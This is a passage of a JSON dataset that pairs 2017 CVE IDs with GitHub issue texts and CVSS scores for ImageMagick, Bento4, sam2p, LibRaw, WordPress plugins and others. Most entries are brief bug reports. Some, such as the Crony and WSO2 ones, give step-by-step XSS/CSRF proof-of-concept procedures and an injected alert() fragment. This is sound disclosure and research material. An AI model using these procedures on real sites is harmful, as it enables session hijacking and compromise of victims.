  9043. "description": "Cross Site Scripting (XSS) & Cross Site Request Forgery (CSRF) in Crony Cronjob Manager Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name: XSS & CSRF in Crony Cronjob Manager Version NUMBERTAG Software: Crony Cronjob Manager Version NUMBERTAG APITAG Plugin) Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG name APITAG variable with APITAG payload and send the request to the server after generating CSRF request to the victim Now, the added XSS payload will be executed on the victim machine and victim machine can be compromised. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The POST Request of the variable APITAG name APITAG in the URL URLTAG is vulnerable to XSS and the plugin is also exploitable using CSRF vulnerability. Whereas, explained in details with screenshots below. FILETAG APITAG NUMBERTAG APITAG Cronjobs list before CSRF code & XSS Payload gets executed. FILETAG APITAG NUMBERTAG APITAG name variable input field which is vulnerable to XSS FILETAG APITAG NUMBERTAG APITAG Capturing the HTTP request in intercept proxy FILETAG APITAG NUMBERTAG APITAG Created a crafted HTML page with XSS input and CSRF Request APITAG APITAG After creating the CSRFT HTML page the user logout and then again login in and then the HTML page is executed. In this case we have executed it from local machine. FILETAG APITAG NUMBERTAG APITAG XSS Payload gets executed in the browser once the link sent by the attacker has been clicked. 
FILETAG APITAG NUMBERTAG APITAG XSS payload gets executed and a new cronjob is created. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (attacker NUMBERTAG Click to APITAG new cronjob\u201d in Crony Cronjob Manager Version NUMBERTAG Plugin and capture the request in intercepting proxy NUMBERTAG Now, Generate a CSRF Request with attacker logged in account NUMBERTAG Modify the request with the code you required to get executed in victim\u2019s browser NUMBERTAG Enter the value for the APITAG name APITAG variable with \u201cXSS&CSRF\u201d and add any scripts, malicious code or payload NUMBERTAG Here, its APITAG which an attacker wants to get executed in victim\u2019s browser and sends the link to victim NUMBERTAG Now, once the victim opens the link in the user logged in browser. Then, immediately the added XSS payload will be executed whenever we review it. APITAG APITAG NUMBERTAG Discovered in Crony Cronjob Manager Version NUMBERTAG Reported to EMAILTAG rg & EMAILTAG NUMBERTAG EMAILTAG replied, \"I'll check it out, thanks for the heads up NUMBERTAG Another response from developer, \"I'll be back into things tomorrow morning, will let you know once it's up NUMBERTAG Issues fixed in version NUMBERTAG developer responded. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  9044. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  9045. "severity": "HIGH",
  9046. "baseScore": 8.0,
  9047. "impactScore": 5.9,
  9048. "exploitabilityScore": 2.1
  9049. },
  9050. {
  9051. "CVE_ID": "CVE-2017-14531",
  9052. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/718",
  9053. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/718",
  9054. "Repo_new": "imagemagick/imagemagick",
  9055. "Issue_Created_At": "2017-09-02T17:23:58Z",
  9056. "description": "memory exhausted in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG APITAG is read from the file as follows: APITAG APITAG is NUMBERTAG bit, it can be as large as NUMBERTAG ffffffff. and APITAG can use up to NUMBERTAG G of RAM, even if the image file is very small. Credit: APITAG of Venustech",
  9057. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9058. "severity": "MEDIUM",
  9059. "baseScore": 6.5,
  9060. "impactScore": 3.6,
  9061. "exploitabilityScore": 2.8
  9062. },
  9063. {
  9064. "CVE_ID": "CVE-2017-14532",
  9065. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/719",
  9066. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/719",
  9067. "Repo_new": "imagemagick/imagemagick",
  9068. "Issue_Created_At": "2017-09-03T15:03:33Z",
  9069. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so APITAG will dereference a NULL pointer and cause a memory error. Credit: APITAG of Venustech",
  9070. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9071. "severity": "CRITICAL",
  9072. "baseScore": 9.8,
  9073. "impactScore": 5.9,
  9074. "exploitabilityScore": 3.9
  9075. },
  9076. {
  9077. "CVE_ID": "CVE-2017-14533",
  9078. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/648",
  9079. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/648",
  9080. "Repo_new": "imagemagick/imagemagick",
  9081. "Issue_Created_At": "2017-08-05T14:49:37Z",
  9082. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG APITAG of Venustech",
  9083. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9084. "severity": "MEDIUM",
  9085. "baseScore": 6.5,
  9086. "impactScore": 3.6,
  9087. "exploitabilityScore": 2.8
  9088. },
  9089. {
  9090. "CVE_ID": "CVE-2017-14600",
  9091. "Issue_Url_old": "https://github.com/delta/pragyan/issues/228",
  9092. "Issue_Url_new": "https://github.com/delta/pragyan/issues/228",
  9093. "Repo_new": "delta/pragyan",
  9094. "Issue_Created_At": "2017-09-14T08:45:02Z",
  9095. "description": "Found NUMBERTAG SQL injection vulnerabilities. Both vulnerabilities require logging in as admin first. In APITAG line NUMBERTAG ERRORTAG function APITAG ERRORTAG no filter at all, so we can cause a boolean-based SQL injection. APITAG like: APITAG the second one in line NUMBERTAG ERRORTAG function APITAG ERRORTAG APITAG has nothing to do with SQL injection, so we can use error-based SQL injection APITAG APITAG",
  9096. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  9097. "severity": "MEDIUM",
  9098. "baseScore": 4.9,
  9099. "impactScore": 3.6,
  9100. "exploitabilityScore": 1.2
  9101. },
  9102. {
  9103. "CVE_ID": "CVE-2017-14604",
  9104. "Issue_Url_old": "https://github.com/freedomofpress/securedrop/issues/2238",
  9105. "Issue_Url_new": "https://github.com/freedomofpress/securedrop/issues/2238",
  9106. "Repo_new": "freedomofpress/securedrop",
  9107. "Issue_Created_At": "2017-09-01T00:36:32Z",
  9108. "description": "Investigate potential attempt to compromise SVS. Kevin Poulsen just tweeted URLTAG a snippet of code that he says he received on his APITAG The code snippet is incomplete, but it appears to be an attempt to exfiltrate sensitive data from the airgapped Secure Viewing Station (SVS). Normally we would prefer to discuss potential security issues privately, in order to develop and deploy a fix without encouraging potential exploitation in case this really is a security vulnerability. In this case, the cat's out of the bag thanks the issue being reported publicly on Twitter, so we feel it's best to discuss it on an open forum in the interest of transparency.",
  9109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  9110. "severity": "MEDIUM",
  9111. "baseScore": 6.5,
  9112. "impactScore": 3.6,
  9113. "exploitabilityScore": 2.8
  9114. },
  9115. {
  9116. "CVE_ID": "CVE-2017-14607",
  9117. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/765",
  9118. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/765",
  9119. "Repo_new": "imagemagick/imagemagick",
  9120. "Issue_Created_At": "2017-09-19T09:55:55Z",
  9121. "description": "Heap buffer over read in APITAG version: CODETAG gcc APITAG NUMBERTAG APITAG NUMBERTAG crash case: FILETAG trigger command : APITAG detail: ERRORTAG",
  9122. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  9123. "severity": "HIGH",
  9124. "baseScore": 8.1,
  9125. "impactScore": 5.2,
  9126. "exploitabilityScore": 2.8
  9127. },
  9128. {
  9129. "CVE_ID": "CVE-2017-14608",
  9130. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/101",
  9131. "Issue_Url_new": "https://github.com/libraw/libraw/issues/101",
  9132. "Repo_new": "libraw/libraw",
  9133. "Issue_Created_At": "2017-09-13T03:32:23Z",
  9134. "description": "Stack out of bounds read in APITAG Command to reproduce: APITAG FILETAG ERRORTAG gdb debug output: ERRORTAG we could see that the index of curve is a large negative number APITAG , leads out of bounds read.",
  9135. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  9136. "severity": "CRITICAL",
  9137. "baseScore": 9.1,
  9138. "impactScore": 5.2,
  9139. "exploitabilityScore": 3.9
  9140. },
  9141. {
  9142. "CVE_ID": "CVE-2017-14624",
  9143. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/722",
  9144. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/722",
  9145. "Repo_new": "imagemagick/imagemagick",
  9146. "Issue_Created_At": "2017-09-03T15:05:21Z",
  9147. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ( messages)[length+offset] will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9148. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9149. "severity": "CRITICAL",
  9150. "baseScore": 9.8,
  9151. "impactScore": 5.9,
  9152. "exploitabilityScore": 3.9
  9153. },
  9154. {
  9155. "CVE_ID": "CVE-2017-14625",
  9156. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/721",
  9157. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/721",
  9158. "Repo_new": "imagemagick/imagemagick",
  9159. "Issue_Created_At": "2017-09-03T15:05:00Z",
  9160. "description": "Null Pointer Dereference in sixel_decode and sixel_output_create. APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG CODETAG APITAG may return NULL, so ( palette)[n NUMBERTAG n] and output >xxx will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9161. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9162. "severity": "CRITICAL",
  9163. "baseScore": 9.8,
  9164. "impactScore": 5.9,
  9165. "exploitabilityScore": 3.9
  9166. },
  9167. {
  9168. "CVE_ID": "CVE-2017-14626",
  9169. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/720",
  9170. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/720",
  9171. "Repo_new": "imagemagick/imagemagick",
  9172. "Issue_Created_At": "2017-09-03T15:03:51Z",
  9173. "description": "Null Pointer Dereference in sixel_decode. APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG APITAG may return NULL, so ( palette)[n NUMBERTAG will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9174. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9175. "severity": "CRITICAL",
  9176. "baseScore": 9.8,
  9177. "impactScore": 5.9,
  9178. "exploitabilityScore": 3.9
  9179. },
  9180. {
  9181. "CVE_ID": "CVE-2017-14628",
  9182. "Issue_Url_old": "https://github.com/pts/sam2p/issues/14",
  9183. "Issue_Url_new": "https://github.com/pts/sam2p/issues/14",
  9184. "Repo_new": "pts/sam2p",
  9185. "Issue_Created_At": "2017-09-18T13:28:39Z",
  9186. "description": "6 bugs found in sam2p. bug NUMBERTAG integer overflow(lead to heap buffer overflow) poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG after the subduction, w will be a negative number. URLTAG so pad will become larger when the program use it to sub w. URLTAG and when using pad, it will access the invalid memory before the allocated chunk. patch: change w from signed to unsigned. bug NUMBERTAG heap buffer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG The crash happened in the APITAG function of the file APITAG The size of the Pic NUMBERTAG is w h planes. But the loop time is nbytes=bperlin h planes, in the loop, pix will add one each time. It will cause a heap overflow when bperlin>w. In this poc, bperlin NUMBERTAG w NUMBERTAG patch: Compare the size of w and bperlin bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: It crashed in function in_xpm_reader. The type of p is char When p NUMBERTAG a0\uff0cp NUMBERTAG p NUMBERTAG will be recognized as a negative integer, it will make bin NUMBERTAG ffffffffffffa NUMBERTAG I, which caused a crash. patch: change p from signed to unsigned char . bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In this poc, when APITAG returned NUMBERTAG to ncols, ncols made it to NUMBERTAG ffffffff, and caused a integer overflow. So the loop will excute NUMBERTAG ffffffff times, which caused the crash. patch: Define Ncols as an int, or you can judge if ncols is NULL. bug NUMBERTAG out of bounds access poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In APITAG function APITAG NUMBERTAG but the size of APITAG is NUMBERTAG If APITAG NUMBERTAG it will crash. patch: modified APITAG or expand the APITAG bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In APITAG function APITAG W h planes will cause integer overflow. patch: check W h planes' value before malloc.",
  9187. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9188. "severity": "CRITICAL",
  9189. "baseScore": 9.8,
  9190. "impactScore": 5.9,
  9191. "exploitabilityScore": 3.9
  9192. },
  9193. {
  9194. "CVE_ID": "CVE-2017-14634",
  9195. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/318",
  9196. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/318",
  9197. "Repo_new": "libsndfile/libsndfile",
  9198. "Issue_Created_At": "2017-09-14T09:30:55Z",
  9199. "description": "a div zero vul in function APITAG in libsndfile NUMBERTAG ERRORTAG",
  9200. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9201. "severity": "MEDIUM",
  9202. "baseScore": 6.5,
  9203. "impactScore": 3.6,
  9204. "exploitabilityScore": 2.8
  9205. },
  9206. {
  9207. "CVE_ID": "CVE-2017-14638",
  9208. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/182",
  9209. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/182",
  9210. "Repo_new": "axiomatic-systems/bento4",
  9211. "Issue_Created_At": "2017-09-08T13:23:17Z",
  9212. "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9213. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9214. "severity": "MEDIUM",
  9215. "baseScore": 6.5,
  9216. "impactScore": 3.6,
  9217. "exploitabilityScore": 2.8
  9218. },
  9219. {
  9220. "CVE_ID": "CVE-2017-14639",
  9221. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/190",
  9222. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/190",
  9223. "Repo_new": "axiomatic-systems/bento4",
  9224. "Issue_Created_At": "2017-09-08T13:41:59Z",
  9225. "description": "stack based buffer underflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9226. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9227. "severity": "HIGH",
  9228. "baseScore": 8.8,
  9229. "impactScore": 5.9,
  9230. "exploitabilityScore": 2.8
  9231. },
  9232. {
  9233. "CVE_ID": "CVE-2017-14640",
  9234. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/183",
  9235. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/183",
  9236. "Repo_new": "axiomatic-systems/bento4",
  9237. "Issue_Created_At": "2017-09-08T13:25:38Z",
  9238. "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9239. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9240. "severity": "MEDIUM",
  9241. "baseScore": 6.5,
  9242. "impactScore": 3.6,
  9243. "exploitabilityScore": 2.8
  9244. },
  9245. {
  9246. "CVE_ID": "CVE-2017-14641",
  9247. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/184",
  9248. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/184",
  9249. "Repo_new": "axiomatic-systems/bento4",
  9250. "Issue_Created_At": "2017-09-08T13:28:21Z",
  9251. "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9252. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9253. "severity": "MEDIUM",
  9254. "baseScore": 6.5,
  9255. "impactScore": 3.6,
  9256. "exploitabilityScore": 2.8
  9257. },
  9258. {
  9259. "CVE_ID": "CVE-2017-14642",
  9260. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/185",
  9261. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/185",
  9262. "Repo_new": "axiomatic-systems/bento4",
  9263. "Issue_Created_At": "2017-09-08T13:31:49Z",
  9264. "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9265. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9266. "severity": "MEDIUM",
  9267. "baseScore": 6.5,
  9268. "impactScore": 3.6,
  9269. "exploitabilityScore": 2.8
  9270. },
  9271. {
  9272. "CVE_ID": "CVE-2017-14643",
  9273. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/187",
  9274. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/187",
  9275. "Repo_new": "axiomatic-systems/bento4",
  9276. "Issue_Created_At": "2017-09-08T13:35:49Z",
  9277. "description": "heap based buffer overflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9278. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9279. "severity": "MEDIUM",
  9280. "baseScore": 6.5,
  9281. "impactScore": 3.6,
  9282. "exploitabilityScore": 2.8
  9283. },
  9284. {
  9285. "CVE_ID": "CVE-2017-14646",
  9286. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/188",
  9287. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/188",
  9288. "Repo_new": "axiomatic-systems/bento4",
  9289. "Issue_Created_At": "2017-09-08T13:37:40Z",
  9290. "description": "heap based buffer overflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9291. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9292. "severity": "HIGH",
  9293. "baseScore": 7.5,
  9294. "impactScore": 3.6,
  9295. "exploitabilityScore": 3.9
  9296. },
  9297. {
  9298. "CVE_ID": "CVE-2017-14651",
  9299. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/15",
  9300. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/15",
  9301. "Repo_new": "cybersecurityworks/disclosed",
  9302. "Issue_Created_At": "2017-09-18T13:24:31Z",
  9303. "description": "Multiple Cross Site Scripting (XSS) in WSO2 Data Analytics Server Version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Multiple Cross Site Scripting (XSS) Product Name: WSO2 Server: WSO2 Data Analytics Server Product. Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: yes Vulnerable URL: FILETAG Vulnerable Variable: APITAG & APITAG APITAG Description: Cross Site Scripting (XSS) vulnerability in WSO2 Data Analytics Server Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) APITAG NUMBERTAG APITAG Accessing the POST Request of the URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG and APITAG APITAG will execute XSS in victim\u2019s browser. FILETAG APITAG NUMBERTAG APITAG POST request URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG FILETAG APITAG NUMBERTAG APITAG Reflected response for the vulnerable variable APITAG APITAG with XSS Payload is executed. FILETAG APITAG NUMBERTAG APITAG POST request URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG (also collection name has to be injected with any invalid symbols) FILETAG APITAG NUMBERTAG APITAG Reflected response for the vulnerable variable APITAG APITAG with XSS Payload is executed. APITAG NUMBERTAG APITAG Accessing the GET Request of the URL URLTAG \"> APITAG alert NUMBERTAG APITAG &random NUMBERTAG will execute XSS in victim\u2019s browser. FILETAG APITAG NUMBERTAG APITAG GET request URL, URLTAG \"> APITAG alert NUMBERTAG APITAG &random NUMBERTAG with XSS payload through path variable is vulnerable to Cross Site Scripting. FILETAG APITAG NUMBERTAG APITAG Accessing GET request is executing XSS payload through the vulnerable variable. APITAG Steps APITAG NUMBERTAG Logon into carbon application with given credentials (admin/admin in localhost NUMBERTAG Now, access the vulnerable GET & POST Request URL with payload inserted into the vulnerable variable NUMBERTAG SS will get executed in the user machine once the user clicks on the given vulnerable link with XSS Payloads for both GET & POST request. APITAG APITAG NUMBERTAG Discovered in WSO2 Data Analytics Server Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team acknowledging the Vulnerability NUMBERTAG Got mail confirming that NUMBERTAG st issue was the new one NUMBERTAG nd issue have been reported earlier & fixed NUMBERTAG Public patching was on progress NUMBERTAG Patched and also, gave credits on their pages NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG Got Token of Appreciation along with a hard copy of an appreciation certificate. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  9304. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  9305. "severity": "MEDIUM",
  9306. "baseScore": 4.8,
  9307. "impactScore": 2.7,
  9308. "exploitabilityScore": 1.7
  9309. },
  9310. {
  9311. "CVE_ID": "CVE-2017-14684",
  9312. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/770",
  9313. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/770",
  9314. "Repo_new": "imagemagick/imagemagick",
  9315. "Issue_Created_At": "2017-09-21T09:06:39Z",
  9316. "description": "memory leak in APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert APITAG /dev/null detail : APITAG APITAG PATHTAG ./magick convert APITAG /dev/null APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d3ead NUMBERTAG in __interceptor_realloc ( PATHTAG NUMBERTAG f NUMBERTAG c7c7feb in APITAG APITAG NUMBERTAG f NUMBERTAG c7c NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG c8fe6bf in APITAG APITAG NUMBERTAG f NUMBERTAG cc NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG c5f NUMBERTAG dd in APITAG APITAG NUMBERTAG f NUMBERTAG c5f NUMBERTAG c4 in APITAG APITAG NUMBERTAG f NUMBERTAG bdae8be in APITAG APITAG NUMBERTAG f NUMBERTAG bf NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c8e in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG APITAG Security Lab",
  9317. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9318. "severity": "MEDIUM",
  9319. "baseScore": 6.5,
  9320. "impactScore": 3.6,
  9321. "exploitabilityScore": 2.8
  9322. },
  9323. {
  9324. "CVE_ID": "CVE-2017-14731",
  9325. "Issue_Url_old": "https://github.com/libofx/libofx/issues/10",
  9326. "Issue_Url_new": "https://github.com/libofx/libofx/issues/10",
  9327. "Repo_new": "libofx/libofx",
  9328. "Issue_Created_At": "2017-09-25T16:21:00Z",
  9329. "description": "ofxdump heap buffer overflow PATHTAG APITAG const ). Hello, I found following heap based buffer overflow from ofxdump. Is this a valid finding and could you fix it, thanks? I am more than happy to continue fuzzing libofx to improve the librarys quality. You can create the reproducer with: ERRORTAG And run it with ofxdump: ERRORTAG",
  9330. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9331. "severity": "MEDIUM",
  9332. "baseScore": 6.5,
  9333. "impactScore": 3.6,
  9334. "exploitabilityScore": 2.8
  9335. },
  9336. {
  9337. "CVE_ID": "CVE-2017-14735",
  9338. "Issue_Url_old": "https://github.com/nahsra/antisamy/issues/10",
  9339. "Issue_Url_new": "https://github.com/nahsra/antisamy/issues/10",
  9340. "Repo_new": "nahsra/antisamy",
  9341. "Issue_Created_At": "2017-07-05T22:14:50Z",
  9342. "description": "Support HTML5. APITAG uses a deprecated FILETAG which does not understand newer HTML5 tags like APITAG URLTAG . While this is a minor issue, it also does not understand newer HTML5 entities like \"&colon;\" or \"&lpar;\". This leads to a security vulnerability where the following text does not get cleaned: APITAG",
  9343. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9344. "severity": "MEDIUM",
  9345. "baseScore": 6.1,
  9346. "impactScore": 2.7,
  9347. "exploitabilityScore": 2.8
  9348. },
  9349. {
  9350. "CVE_ID": "CVE-2017-14737",
  9351. "Issue_Url_old": "https://github.com/randombit/botan/issues/1222",
  9352. "Issue_Url_new": "https://github.com/randombit/botan/issues/1222",
  9353. "Repo_new": "randombit/botan",
  9354. "Issue_Created_At": "2017-09-25T16:11:07Z",
  9355. "description": "Investigate RSA side channel from Usenix Security. Looking through papers from this years Usenix Security I come across an interesting one on identifying cache based timing channels. URLTAG Hm I wonder what bugs they found... from the abstract APITAG we have successfully discovered previously unknown issues in two widely used cryptosystems, APITAG and Botan.\" well then! They analyze NUMBERTAG but the paper mentions \"we notice that this vulnerability affects several other versions of Botan, including NUMBERTAG and NUMBERTAG and so presumably NUMBERTAG also). Haven't read the paper carefully enough to understand the issue yet but hopefully this can be addressed in time for NUMBERTAG FTR I never received any contact about this ... shrug",
  9356. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  9357. "severity": "MEDIUM",
  9358. "baseScore": 5.5,
  9359. "impactScore": 3.6,
  9360. "exploitabilityScore": 1.8
  9361. },
  9362. {
  9363. "CVE_ID": "CVE-2017-14739",
  9364. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/780",
  9365. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/780",
  9366. "Repo_new": "imagemagick/imagemagick",
  9367. "Issue_Created_At": "2017-09-25T08:25:56Z",
  9368. "description": "Null Pointer Dereference at APITAG of APITAG Hi all, Another potential NPD at APITAG in APITAG , and there is no null check after this acquiring. It could lead to denial of service when out of memory occurs. This seems a similar case of URLTAG ERRORTAG Regards, Alex, APITAG Inc.",
  9369. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9370. "severity": "HIGH",
  9371. "baseScore": 7.5,
  9372. "impactScore": 3.6,
  9373. "exploitabilityScore": 3.9
  9374. },
  9375. {
  9376. "CVE_ID": "CVE-2017-14741",
  9377. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/771",
  9378. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/771",
  9379. "Repo_new": "imagemagick/imagemagick",
  9380. "Issue_Created_At": "2017-09-21T09:07:05Z",
  9381. "description": "endless loop in APITAG Version: APITAG NUMBERTAG I add a crafted font in PATHTAG APITAG and then run magick background lightblue fill blue font test size NUMBERTAG caption:'hello world' FILETAG magick will always occupy NUMBERTAG CPU. After I took a look, it maybe enter a endless loop in APITAG you can get the font from FILETAG",
  9382. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9383. "severity": "MEDIUM",
  9384. "baseScore": 6.5,
  9385. "impactScore": 3.6,
  9386. "exploitabilityScore": 2.8
  9387. },
  9388. {
  9389. "CVE_ID": "CVE-2017-14749",
  9390. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2008",
  9391. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2008",
  9392. "Repo_new": "jerryscript-project/jerryscript",
  9393. "Issue_Created_At": "2017-09-07T07:48:07Z",
